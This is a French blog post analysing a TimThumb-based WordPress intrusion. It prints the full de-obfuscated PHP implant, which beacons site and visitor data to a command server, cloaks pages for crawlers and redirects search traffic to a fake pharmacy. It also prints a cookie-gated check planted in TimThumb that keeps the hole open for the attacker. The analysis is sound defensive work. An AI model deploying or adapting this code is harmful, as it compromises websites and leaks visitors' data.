WordPress Timthumb Viagra Attack : klikcentral.com / glavgen.com


Une tentative de piratage, ce matin, qui exploite la vulnérabilité de TimThumb (le script de redimensionnement d'images embarqué dans de nombreux thèmes WordPress).

Le code obfusqué que l'attaquant a tenté d'insérer dans le fichier wp-includes/pluggable.php de WordPress :

Une fois désobfusqué, on arrive à ce code PHP (reproduit tel quel à des fins d'analyse — ne pas déployer) :

 

// Analyst annotation: de-obfuscated payload the attacker tried to append to
// wp-includes/pluggable.php. The code is reproduced byte-for-byte for analysis;
// do not deploy. Each section is described by the comment above it.
//
// Silence every PHP error/warning (undefined-index notices on $_GET/$_SERVER keys,
// failed outbound HTTP calls, ...) so the implant leaves no visible trace.
error_reporting(0);
// Table of /24 prefixes (first three octets only). Given the variable name and the
// "bot" User-Agent test below these are presumably search-engine crawler ranges —
// not verified here; check against current allocations before reusing the list.
 $bot_list = array("8.6.48","62.172.199","62.27.59","63.163.102","64.157.137","64.157.138","64.233.173","64.68.80","64.68.81","64.68.82","64.68.83","64.68.84","64.68.85","64.68.86","64.68.87","64.68.88","64.68.89","64.68.90","64.68.91","64.68.92","64.75.36","66.163.170","66.163.174","66.196.101","66.196.65","66.196.67","66.196.72","66.196.73","66.196.74","66.196.77","66.196.78","66.196.80","66.196.81","66.196.90","66.196.91","66.196.92","66.196.93","66.196.97","66.196.99","66.218.65","66.218.70","66.228.164","66.228.165","66.228.166","66.228.173","66.228.182","66.249.64","66.249.65","66.249.66","66.249.67","66.249.68","66.249.69","66.249.70","66.249.71","66.249.72","66.249.73","66.249.78","66.249.79","66.94.230","66.94.232","66.94.233","66.94.238","67.195.115","67.195.34","67.195.37","67.195.44","67.195.45","67.195.50","67.195.51","67.195.52","67.195.53","67.195.54","67.195.58","67.195.98","68.142.195","68.142.203","68.142.211","68.142.212","68.142.230","68.142.231","68.142.240","68.142.246","68.142.249","68.142.250","68.142.251","68.180.216","68.180.250","68.180.251","69.147.79","72.14.199","72.30.101","72.30.102","72.30.103","72.30.104","72.30.107","72.30.110","72.30.111","72.30.124","72.30.128","72.30.129","72.30.131","72.30.132","72.30.133","72.30.134","72.30.135","72.30.142","72.30.161","72.30.177","72.30.179","72.30.213","72.30.214","72.30.215","72.30.216","72.30.221","72.30.226","72.30.252","72.30.54","72.30.56","72.30.60","72.30.61","72.30.65","72.30.78","72.30.79","72.30.81","72.30.87","72.30.9","72.30.97","72.30.98","72.30.99","74.6.11","74.6.12","74.6.13","74.6.131","74.6.16","74.6.17","74.6.18","74.6.19","74.6.20","74.6.21","74.6.22","74.6.23","74.6.24","74.6.240","74.6.25","74.6.26","74.6.27","74.6.28","74.6.29","74.6.30","74.6.31","74.6.65","74.6.66","74.6.67","74.6.68","74.6.69","74.6.7","74.6.70","74.6.71","74.6.72","74.6.73","74.6.74","74.6.75","74.6.76","74.6.79","74.6.8","74.6.85","74.6.86","74.6.87","74.6.9","74.55.27","141.185.209","169.207.238"
,"199.177.18","202.160.178","202.160.179","202.160.180","202.160.181","202.160.183","202.160.185","202.165.96","202.165.98","202.165.99","202.212.5","202.46.19","203.123.188","203.141.52","203.255.234","206.190.43","207.126.239","209.1.12","209.1.13","209.1.32","209.1.38","209.131.40","209.131.41","209.131.48","209.131.49","209.131.50","209.131.51","209.131.60","209.131.62","209.185.108","209.185.122","209.185.141","209.185.143","209.185.253","209.191.123","209.191.64","209.191.65","209.191.82","209.191.83","209.67.206","209.73.176","209.85.238","211.14.8","211.169.241","213.216.143","216.109.121","216.109.126","216.136.233","216.145.58","216.155.198","216.155.200","216.155.202","216.155.204","216.239.193","216.239.33","216.239.37","216.239.39","216.239.41","216.239.45","216.239.46","216.239.51","216.239.53","216.239.57","216.239.59","216.32.237","216.33.229","174.129.130","174.129.66","85.17.19");
// Strip the last octet of the client IP so it can be matched against the /24
// prefixes above. Behind a reverse proxy REMOTE_ADDR is the proxy, not the visitor.
 $ip = preg_replace("/\.(\d+)$/", '', $_SERVER["REMOTE_ADDR"]);
 $agent = $_SERVER["HTTP_USER_AGENT"];
// Implant liveness probe: "?testd=ok" makes the page answer "ok!" and stop, so the
// attacker can confirm the injection took (loose == comparison).
if ($_GET["testd"]=="ok") { print "ok!"; exit; }
// Crawler branch. in_array() is non-strict, and strpos() is used as a boolean, so a
// User-Agent that *starts* with "bot" (offset 0) is treated as no match.
if(in_array($ip, $bot_list) || strpos($agent, "bot")) {
// Second probe: a query string of exactly "q" also answers "ok!".
 if ($_SERVER["QUERY_STRING"]=="q") { print "ok!"; exit; }
// $page is built but never read below (dead code in the sample).
$page=urlencode("http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]);
// Beacon / C2 URL: the base64 decodes to "http://glavgen.com/get.php?site=". Every
// crawler hit leaks the host, request URI, client IP and User-Agent to that server.
 $outsourceurl=base64_decode('aHR0cDovL2dsYXZnZW4uY29tL2dldC5waHA/c2l0ZT0=').urlencode($_SERVER['HTTP_HOST']).'&page='.urlencode($_SERVER['REQUEST_URI']).'&ip='.urlencode($_SERVER['REMOTE_ADDR']).'&agent='.urlencode($_SERVER['HTTP_USER_AGENT']);
// Fetch the C2 response, preferring curl; the fallback needs allow_url_fopen.
// No timeout is set on either path, so an unreachable C2 stalls the crawler request.
 if (function_exists("curl_init")) {
 $c = curl_init();
 curl_setopt($c, CURLOPT_URL, $outsourceurl);
 curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
 $out = curl_exec($c);
 curl_close($c);
 } else {
 $out = file_get_contents($outsourceurl);
 }
// Cloaking: if the C2 answers with "OK!", the remainder (offset 4 skips "OK!" plus
// one separator byte) is served to the crawler in place of the real page.
 if (substr($out,0,3) == "OK!") { echo substr($out,4); die; }
 }
// Visitor branch — runs for every request that did not die above, crawlers included.
// Unanchored, case-sensitive substring match of search-engine names in the Referer.
if (preg_match('/live|msn|yahoo|google|ask|aol/', $_SERVER["HTTP_REFERER"])) {
// Pharma keywords searched for in the Referer ('hoodia' and 'acomplia' are listed twice).
 $tabs = array ('viagra','cialis','levitra','propecia','prozac','xenical','soma','zoloft','tamiflu','sildenafil','tadalafil','vardenafil','finasteride','hoodia','acomplia','phentermine','adipex','tramadol','ultram','xanax','valium','ambien','ativan','vicodin','hoodia','acomplia');
 $niche='unknown';
// No break in the loop: when several keywords match, the last one in $tabs wins.
 foreach($tabs as $tab) {
 if(preg_match("/$tab/i", $_SERVER["HTTP_REFERER"])) {
 $niche = $tab;
 }
 }
 if ($niche!="unknown") {
// Redirect target: the base64 decodes to "http://klikcentral.com/traffic/in.cgi?11&parameter=".
 $urlsutra = base64_decode('aHR0cDovL2tsaWtjZW50cmFsLmNvbS90cmFmZmljL2luLmNnaT8xMSZwYXJhbWV0ZXI9');
// Server-side fetch of the affiliate page with the raw Referer and host appended
// (not urlencoded). "false ==" is a loose comparison, so an empty body also counts
// as failure and falls through to a client-side Location redirect; otherwise the
// fetched HTML is echoed in place of the blog page.
 if (false == ($str=file_get_contents($urlsutra.$niche."&seoref=".$_SERVER["HTTP_REFERER"]."&HTTP_REFERER=".$_SERVER['HTTP_HOST']))) {
 header("location: ".$urlsutra.$niche."&seoref=".$_SERVER["HTTP_REFERER"]."&HTTP_REFERER=".$_SERVER['HTTP_HOST']);
 exit;
 } else {
 echo $str;
 exit;
 }
 }
 }

À chaque visite du blog piraté par un robot d'indexation (adresse IP dont les trois premiers octets figurent dans la liste $bot_list, ou User-Agent contenant « bot »), une requête vers l'URL suivante est effectuée : http://glavgen.com/get.php?site=&page=&ip=&agent= Le serveur de l'attaquant reçoit ainsi le nom du site, la page demandée, l'adresse IP et le User-Agent du visiteur ; s'il répond par un contenu préfixé « OK! », ce contenu est servi au robot à la place de la vraie page (cloaking). Ensuite, pour toute requête qui n'a pas été interrompue par ce premier traitement, si l'internaute provient d'un moteur de recherche (du moins si le nom d'un moteur de recherche apparaît dans le referer) et que ce dernier contient aussi un des mots suivants :

'viagra','cialis','levitra','propecia','prozac','xenical','soma','zoloft','tamiflu','sildenafil','tadalafil','vardenafil','finasteride','hoodia','acomplia','phentermine','adipex','tramadol','ultram','xanax','valium','ambien','ativan','vicodin','hoodia','acomplia'
alors l'internaute sera redirigé vers le site suivant : http://klikcentral.com/traffic/in.cgi?11&parameter=<mot-clé>&seoref=<referer>&HTTP_REFERER=<hôte> — le serveur tente d'abord de récupérer lui-même cette page pour en afficher le contenu, et n'envoie une redirection « Location » qu'en cas d'échec — qui, vous l'avez deviné, est un faux site de vente de produits pharmaceutiques :

Un second « hack » a lieu, qui insère le code suivant dans la librairie TimThumb elle-même :

// Analyst annotation: gate inserted into the TimThumb library. Unless the request
// carries a cookie "access-admin" whose MD5 equals the hard-coded digest, any "src"
// value containing ".php" is rejected. Net effect: rival attackers are locked out of
// the same vector while whoever holds the cookie keeps using it.
if(md5($_COOKIE['access-admin']) != "f732d47960be7e806861987f98a9574c") {
 $mysrc = $_GET['src'];
// strpos() used as a boolean: ".php" at offset 0 is not caught, and the test is
// case-sensitive (".PHP" passes). A request without "src" only raises a notice.
 if(strpos($mysrc,'.php')) {
 die;
 }
 }

Le but est d'empêcher un autre hack (un attaquant concurrent) en rejetant tout paramètre « src » contenant « .php » — sauf si la requête présente un cookie « access-admin » dont le MD5 correspond à la valeur codée en dur : l'attaquant se réserve ainsi un accès exclusif à la faille.

Intéressant de constater que, cette fois, le hack n'a pas pour but d'insérer du code menant à un exploit sur le site web pour infecter les visiteurs du blog, ni de les rediriger vers de fausses pages d'alerte faisant la promotion de rogues, mais de les envoyer vers une fausse pharmacie en ligne — ce qui est plutôt rare.
